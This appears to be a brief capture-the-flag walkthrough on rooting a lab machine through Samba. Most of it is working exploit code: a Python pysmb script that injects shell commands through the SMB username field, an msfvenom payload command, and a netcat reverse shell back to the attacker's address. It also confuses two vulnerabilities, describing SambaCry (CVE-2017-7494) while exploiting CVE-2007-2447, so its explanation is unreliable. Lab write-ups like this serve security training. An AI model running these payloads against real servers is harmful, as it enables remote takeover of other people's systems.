Sambacry

Samba smbd 3.X-4.X

Samba in 4.5.9 version and before that is vulnerable to a remote code execution vulnerability named SambaCry. CVE-2017-7494 allows remote authenticated users to upload a shared library to a writable shared folder, and perform code execution attacks to take control of servers that host vulnerable Samba services. CVE-2007-2447 Script

Let’s write the script in Python3. We need to get pysmb library to authenticate with smb. The exploit script does not need anything more than a RPC Connect Request.

Write a simple POC:

#!/usr/bin/env python3 
from smb.SMBConnection import SMBConnection 
SMBConnection( 
 "/=`nohup ping -c 3 10.10.14.33`",  
    "",  
    "",  
    "", 
).connect("10.10.10.3", 139) 

Listen on tun0 with tcpdump and execute script.

smb-enum

We get a ping reply which confirms Arbitrary Code Execution. Replace payload with reverse shell. Generate Shellcode for payload with msfvenom.

msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.33 LPORT=2222 EXITFUNC=thread 

payload-with-msfvenom

Now replace the ping command in Python script with netcat reverse shell payload

from smb.SMBConnection import SMBConnection 
SMBConnection( 
    "/=`nohup mkfifo /tmp/lmzf; nc 10.10.14.33 2222 0</tmp/lmzf | /bin/sh >/tmp/lmzf 2>&1; rm /tmp/lmzf`", 
    "", 
    "", 
    "", 
).connect("10.10.10.3", 139) 

Open netcat listener on port 2222 and execute script.

And finally we have the Root Shell!! Lame! :)